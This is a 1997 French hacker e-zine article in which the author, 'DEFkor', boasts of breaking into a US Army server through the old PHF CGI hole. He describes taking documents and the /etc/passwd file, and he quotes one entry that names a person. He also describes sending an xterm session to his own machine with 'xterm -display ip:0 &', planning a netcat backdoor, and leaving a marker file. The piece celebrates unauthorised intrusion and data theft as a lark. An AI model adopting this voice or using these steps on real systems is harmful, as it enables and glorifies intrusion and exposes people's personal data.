
                    :                                 :
                   -: Site US Military [xxx.army.mil] :-               04/97
                    :                                 :



--[ Introduction ]--

  Alors tout d'abord, ce texte n'est pas ecrit pour dire comment hacker un
serveur web, il existe deja beaucoup de docs accessibles sur le reseau qui
l'expliquent tres bien. Ensuite je ne me considere pas comme un hacker mais
comme un pauvre L@m&r qui l'est moins que certains autres :) 

  Sinon je voudrais passer avant tout des H&Ll0 a quelques personnes... 
  Au groupe Hackers Hideout, PhE!, F-Kaos, Razor 1911, #MJ13, a Rex-Mundi,
CoD4, Kewl, Sorcery, BoO, [happy], DS, Palm, Captnt [t'es ou CapTnT ?!],
Rahan`, Manitinx, et puis a tout ceux que j'ai oublie :)

  Bravo pour le debut de NoRoute, ca faisait longtemps qu'on avait pas eu un
zine on-line.



--[ Comment j'ai trouve le serveur ]--

  Ben par hasard, comme beaucoup d'entre nous je pense. En fait, je me
balladais sur IRC un soir (enfin matin), vers 3-4 heures, et un gars (dont
j'ai oublie le nom), me dit un truc dans le genre : "hey les gars [on etait
2 :)]", il y a un serveur FTP marrant, c'est xxx.army.mil et ca a l'air
interessant". Ma curiosite naturelle me poussa a aller voir...



--[ La suite ]--

  D'abord, j'ai constate que le root avait mis la racine de son serveur httpd
dans le meme rep que celui du FTP... Et qu'il utilisait WuFTPd 2.4. La
curiosite continuant, je suis alle voir sa page web, c'etait sur les missiles
US [euh, la, j'ai pas trop lu en fait]. Constatant qu'il utilisait un vieux
serveur httpd, j'ai teste PHF, http://xxx.army.mil/cgi-bin/phf, et Oooh!
miracle ! Il etait la... :) N'y croyant pas mes yeux je commence a faire des
ls un peu partout, et je vois qu'il existe un repertoire Windows3.11 [la
machine etait sous SunOS], je capte pas trop ce que ca faisait la, mais
bon... Je regarde dedans, je trouve MSOffice, et je me decide donc a prendre
toutes les docs du serveur, que je fournis sur ma page web dans la section 
"hacke". 



--[ Ce que j'ai recupere ]--

  Je vous donne quand meme le titre d'une des docs :
  "Analysis of the Vetronics Real Time Operating System (VRTOS)
   and Its Applicability to the Missile Domain".

  Je trouve ca sympa :) Il y a pas a dire, vraiment des taches... Bon alors
la je continuasse ma quete ;)... Je recupere le /etc/passwd mais bon, le
server etait shadowed (quand meme). Voila un extrait (voir ma page pour le
reste) :

"jacuff:x:126:60:Justin Acuff <jacuff@xxx.army.mil>:/home/jacuff:/bin/bash"

  Je dois dire que je ne sais pas qui c'est :) Enfin je m'en tape... :)


--[ Ce que j'ai essayer ]--

  Apres, j'ai commence a regarder ou etait le xterm, il y avait openwin, j'ai
donc balance un xterm chez moi (xterm -display ip:0 &) mais bon, la lenteur
du truc, c'est chiant quand meme :) Je dois avouer que j'ai laisse ensuite
tomber le serveur pendant un moment car j'avais d'autres trucs plus
interessants a faire, mais quand j'y suis retourne je me suis decide a
foutre un netcat sur le port xxxx pour acces sans ID, alors j'ai commence a
potasser la doc, etc, mais le temps que je teste sur mon reseau local, etc,
le PHF ne marchait plus. En effet, apparemment, ce qu'ils ont fait, c'est
qu'ils ont fusionne 2 machines en 1, et pas sur celle qui avait PHF. :=(
C'est bien dommage, j'avais cree un .defkor dans la racine du httpd, il
existait donc xxx.army.mil/.defkor :)

  Enfin bon, mon projet fut alors brise, j'ai plus qu'a en chercher un
autre :)



--[ Pour la fin de votre lecture ]--

  Ben en fait ce qui est con c'est que je n'ai pas pris un seul screenshot
de ce que j'ai fait, mais bon, de toute facon, je crois que faire un
screenshot, c'est marrant, mais bon, j'aurais pu en faire un factice tres
facilement, mais c'est pas le but je crois !

  J'ai pas ecrit cette doc. pour dire "je l'ai fait", et je suis sur que
beaucoup de monde ne me croit pas [vu que deja beaucoup sur IRC ne me croit
pas], mais je m'en tape !!! :)

  Sinon, je voudrais dire a CoD4 que son hack sur Marseille etait tres drole,
ca leur a fait les pieds :)

  J'ai essaye de faire ce petit texte aussi lisible que possible, pas d'ASCII,
etc. Desole pour ceux qui aiment...

  Coup de gueule perso: IRC ca pue de plus en plus, et ca a tendance a se
degrader, surtout depuis Noel dernier. Depuis 2 ans que je "chatte", eh bien
je dois dire que tout ce petit monde la me decoit de plus en plus.



--[ Projets ]--

  Je compte faire une doc detaillee de pas mal de pages sur PGP en francais,
je sais pas si ca existe, alors je l'ecris. En fait j'avais bien commence,
presque fini quoi, puis j'ai laisse de cote, ca me gonflait. Maintenant, je
veux la finir et je retrouve plus le fichier... Aaaarg :=( Alors, tout a
recommencer, sniif...


(  Par DEFkor <defkor@mygale.org>, membre de DEFkor UnDeRgRoUnD	           )
(  www.mygale.org/~defkor/ [ouais, la page est lourde, et alors ?!! ;)]      )

